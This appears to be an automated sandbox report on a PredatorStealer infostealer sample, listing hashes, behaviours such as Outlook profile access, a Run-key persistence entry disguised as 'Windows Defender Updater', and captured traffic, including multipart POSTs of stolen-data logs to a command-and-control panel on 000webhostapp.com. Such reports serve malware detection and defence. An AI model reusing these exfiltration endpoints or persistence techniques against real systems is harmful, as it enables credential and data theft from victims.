predatorstealer | 07f3462682d325ceac97d83e7f3d678ab56b9d1b74a51ad6ef6ff49767e30c3d

Analysis

max time kernel
149s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240426-en
resource tags

arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
submitted
04/05/2024, 15:34 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NZqhGfqWq.exe
Size

536KB
MD5

bc389e564d09707cc36671f296665afd
SHA1

09448c0068106bbf674cae0d7dbb838e469dd896
SHA256

07f3462682d325ceac97d83e7f3d678ab56b9d1b74a51ad6ef6ff49767e30c3d
SHA512

25ea85dba05ce62fcda6d5621d9ef157c24a4037895513c6ca691e74406e25d1f0f0a57a546a5ba5e8cbee0371cc9f285a7e1c6f91bd6c20e29a9a1b3f58d931
SSDEEP

6144:X+BWmtpZQYS2PjCLfjSCpkALDUbr0tJ0nzbWdG/Wow7+JJU8:OPw2PjCLe3a6Q70zbYow608

Score

10^/10

predatorstealer collection discovery persistence spyware stealer

Malware Config

Signatures

PredatorStealer
Predator is a modular stealer written in C#.
stealer predatorstealer

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Control Panel\International\Geo\Nation	NZqhGfqWq.exe

Executes dropped EXE 1 IoCs

pid	Process
840	Zip.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NZqhGfqWq.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NZqhGfqWq.exe
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NZqhGfqWq.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender Updater = "C:\\Users\\Admin\\AppData\\Local\\Temp\\update_240403.exe / start"	NZqhGfqWq.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
3	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
1948	NZqhGfqWq.exe

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1948	NZqhGfqWq.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1948	NZqhGfqWq.exe
Token: SeDebugPrivilege	840	Zip.exe

Suspicious use of WriteProcessMemory 2 IoCs

description	pid	Process	procid_target
PID 1948 wrote to memory of 840	1948	NZqhGfqWq.exe	90
PID 1948 wrote to memory of 840	1948	NZqhGfqWq.exe	90

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NZqhGfqWq.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-711569230-3659488422-571408806-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	NZqhGfqWq.exe

C:\Users\Admin\AppData\Local\Temp\NZqhGfqWq.exe
"C:\Users\Admin\AppData\Local\Temp\NZqhGfqWq.exe"
1⤵
- Checks computer location settings
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:1948
- C:\Users\Admin\AppData\Local\Temp\Zip.exe
  "C:\Users\Admin\AppData\Local\Temp\Zip.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:840

Network

DNS

ip-api.com

Zip.exe

Remote address:

8.8.8.8:53

Request

ip-api.com

IN A

Response

ip-api.com

IN A

208.95.112.1
GET

http://ip-api.com/json/

NZqhGfqWq.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:26 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
GET

http://ip-api.com/json/

NZqhGfqWq.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:28 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 58
X-Rl: 43
GET

http://ip-api.com/json/

NZqhGfqWq.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:30 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 55
X-Rl: 42
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

204.79.197.237

dual-a-0034.a-msedge.net

IN A

13.107.21.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=530628298&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=0EB8DE2B5137654109D4CA5E50D7649A; domain=.bing.com; expires=Thu, 29-May-2025 15:34:28 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 84F139EF14FC459F87367F423B15494F Ref B: LON04EDGE1214 Ref C: 2024-05-04T15:34:28Z
date: Sat, 04 May 2024 15:34:27 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

Remote address:

204.79.197.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0EB8DE2B5137654109D4CA5E50D7649A; _EDGE_S=SID=1DA706B6176D6567184B12C3162564F3

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=Fe2DF-fy9TDBPO_fkQbQPUNAF6X_vwKIMAwYUSxE4Q0; domain=.bing.com; expires=Thu, 29-May-2025 15:34:28 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 4F994FF5416D49188B5F4259D2710A0B Ref B: LON04EDGE1214 Ref C: 2024-05-04T15:34:28Z
date: Sat, 04 May 2024 15:34:28 GMT
DNS

1.112.95.208.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.112.95.208.in-addr.arpa

IN PTR

Response

1.112.95.208.in-addr.arpa

IN PTR

ip-apicom
DNS

77.190.18.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

77.190.18.2.in-addr.arpa

IN PTR

Response

77.190.18.2.in-addr.arpa

IN PTR

a2-18-190-77deploystaticakamaitechnologiescom
DNS

14.160.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.160.190.20.in-addr.arpa

IN PTR

Response
GET

https://www.bing.com/aes/c.gif?RG=aa8a26ab71d14154a517e164a627c2ff&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131910Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038

Remote address:

23.62.61.146:443

Request

GET /aes/c.gif?RG=aa8a26ab71d14154a517e164a627c2ff&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240426T131910Z&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=0EB8DE2B5137654109D4CA5E50D7649A

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: CDDBA9844BBA48A0B6B21A0D3ACA3BCF Ref B: BRU30EDGE0813 Ref C: 2024-05-04T15:34:28Z
content-length: 0
date: Sat, 04 May 2024 15:34:28 GMT
set-cookie: _EDGE_S=SID=1DA706B6176D6567184B12C3162564F3; path=/; httponly; domain=bing.com
set-cookie: MUIDB=0EB8DE2B5137654109D4CA5E50D7649A; path=/; httponly; expires=Thu, 29-May-2025 15:34:28 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.8e3d3e17.1714836868.1887fd75
DNS

237.197.79.204.in-addr.arpa

Remote address:

8.8.8.8:53

Request

237.197.79.204.in-addr.arpa

IN PTR

Response
DNS

95.221.229.192.in-addr.arpa

Remote address:

8.8.8.8:53

Request

95.221.229.192.in-addr.arpa

IN PTR

Response
DNS

146.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

146.61.62.23.in-addr.arpa

IN PTR

Response

146.61.62.23.in-addr.arpa

IN PTR

a23-62-61-146deploystaticakamaitechnologiescom
DNS

149.220.183.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

149.220.183.52.in-addr.arpa

IN PTR

Response
DNS

55.36.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

55.36.223.20.in-addr.arpa

IN PTR

Response
GET

http://ip-api.com/json/

Zip.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:33 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 53
X-Rl: 41
GET

http://ip-api.com/json/

Zip.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:34 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 51
X-Rl: 40
GET

http://ip-api.com/json/

Zip.exe

Remote address:

208.95.112.1:80

Request

GET /json/ HTTP/1.1
Host: ip-api.com

Response

HTTP/1.1 200 OK

Date: Sat, 04 May 2024 15:34:35 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 297
Access-Control-Allow-Origin: *
X-Ttl: 50
X-Rl: 39
DNS

unseamed-semaphore.000webhostapp.com

NZqhGfqWq.exe

Remote address:

8.8.8.8:53

Request

unseamed-semaphore.000webhostapp.com

IN A

Response

unseamed-semaphore.000webhostapp.com

IN CNAME

us-east-1.route-1.000webhost.awex.io

us-east-1.route-1.000webhost.awex.io

IN A

145.14.144.245
POST

http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0

NZqhGfqWq.exe

Remote address:

145.14.144.245:80

Request

POST /Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8dc6c4fb9f8560c
Host: unseamed-semaphore.000webhostapp.com
Content-Length: 453970
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found

Date: Sat, 04 May 2024 15:34:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 7acd4e21f7a2e772c75ed4db912e4f17
DNS

245.144.14.145.in-addr.arpa

Remote address:

8.8.8.8:53

Request

245.144.14.145.in-addr.arpa

IN PTR

Response
GET

http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

NZqhGfqWq.exe

Remote address:

145.14.144.245:80

Request

GET /Panel/gate.php?hwid=GBBFEBFBFF00090672 HTTP/1.1
Host: unseamed-semaphore.000webhostapp.com

Response

HTTP/1.1 404 Not Found

Date: Sat, 04 May 2024 15:34:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 7dde155aa9257ea1140122f290032efe
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
POST

http://unseamed-semaphore.000webhostapp.com/Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0

NZqhGfqWq.exe

Remote address:

145.14.144.245:80

Request

POST /Panel/logs.php?hwid=GBBFEBFBFF00090672&Passwords=0&CreditCards=0&Cookies=0&AutoFill=0&Wallets=0 HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------8dc6c4fd696f009
Host: unseamed-semaphore.000webhostapp.com
Content-Length: 453970
Expect: 100-continue
GET

http://unseamed-semaphore.000webhostapp.com/Panel/gate.php?hwid=GBBFEBFBFF00090672

NZqhGfqWq.exe

Remote address:

145.14.144.245:80

Request

GET /Panel/gate.php?hwid=GBBFEBFBFF00090672 HTTP/1.1
Host: unseamed-semaphore.000webhostapp.com

Response

HTTP/1.1 404 Not Found

Date: Sat, 04 May 2024 15:35:47 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: 87f248eed31c4b2ba5f903f35d7deb88
DNS

36.56.20.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

36.56.20.217.in-addr.arpa

IN PTR

Response
DNS

43.229.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.229.111.52.in-addr.arpa

IN PTR

Response
GET

http://unseamed-semaphore.000webhostapp.com/Panel/task.php?hwid=GBBFEBFBFF00090672

NZqhGfqWq.exe

Remote address:

145.14.144.245:80

Request

GET /Panel/task.php?hwid=GBBFEBFBFF00090672 HTTP/1.1
Host: unseamed-semaphore.000webhostapp.com

Response

HTTP/1.1 404 Not Found

Date: Sat, 04 May 2024 15:36:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Accept-Ranges: bytes
Server: awex
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Request-ID: f9dc3996af95bcfb0f3238815be981b4
DNS

tse1.mm.bing.net

Remote address:

8.8.8.8:53

Request

tse1.mm.bing.net

IN A

Response

tse1.mm.bing.net

IN CNAME

mm-mm.bing.net.trafficmanager.net

mm-mm.bing.net.trafficmanager.net

IN CNAME

dual-a-0001.a-msedge.net

dual-a-0001.a-msedge.net

IN A

204.79.197.200

dual-a-0001.a-msedge.net

IN A

13.107.21.200
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783939_14IT4JGOWRFC6CMW9&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 621794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 0BC909C1579748068BC48298BCD8EB38 Ref B: LON04EDGE0911 Ref C: 2024-05-04T15:36:06Z
date: Sat, 04 May 2024 15:36:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931611_1SOG5TNNJKE1WH1R0&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 792794
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 14DAC17E74C340089619B7E4E9D34D9E Ref B: LON04EDGE0911 Ref C: 2024-05-04T15:36:06Z
date: Sat, 04 May 2024 15:36:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239340783938_154JBSOQL12JS43YR&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 627437
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: D7C24EFBE4624FCD9C719BB78B0DD3A6 Ref B: LON04EDGE0911 Ref C: 2024-05-04T15:36:06Z
date: Sat, 04 May 2024 15:36:06 GMT
GET

https://tse1.mm.bing.net/th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

Remote address:

204.79.197.200:443

Request

GET /th?id=OADD2.10239360931612_153L2SVWUYAQUME4E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
host: tse1.mm.bing.net
accept: */*
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-length: 659775
content-type: image/jpeg
x-cache: TCP_HIT
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}&ndcParam=QUZE
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: F26AC87C70984EDF92258996A6EE4CD0 Ref B: LON04EDGE0911 Ref C: 2024-05-04T15:36:06Z
date: Sat, 04 May 2024 15:36:06 GMT

208.95.112.1:80

http://ip-api.com/json/

http

NZqhGfqWq.exe

595 B
1.7kB
10
6

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200

HTTP Request

GET http://ip-api.com/json/

HTTP Response

200
204.79.197.237:443

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8hhjKCJ2KjySix7y4l6oPjzVUCUzr6AWuetGUKPZPsFoQhudx4YFmUrYaV_QyKXbNf9ZUYlljkjtrdCbNMI2D-WcxrvfgexFov0Vafnlww_6ioFIaQiMp0OI-vjJG6zxvn8pY_4tgyVEHHw5pOAgRg7BvAHB0Lo4e4XX5JVlMHao9kaPR%26u%3DbXN4Ym94JTNhJTJmJTJmZ2FtZSUyZiUzZnByb2R1Y3RJZCUzZDlOMEg2MktaM0JYViUyNm9jaWQlM2RpbnBfcm1jX3hib19zdGFydF9UUHRpdGxlX2VuZ2FnZQ%26rlid%3Db8a5a56e54af194017b1c345fd0012c3&TIME=20240426T131910Z&CID=530628298&EID=&tids=15000&adUnitId=11730597&localId=w:416143B6-C385-8B32-96EF-B62827C91949&deviceId=6825828828137038&muid=416143B6C3858B3296EFB62827C91949

tls, http2

2.5kB
9.0kB
20
16

HTTP Request

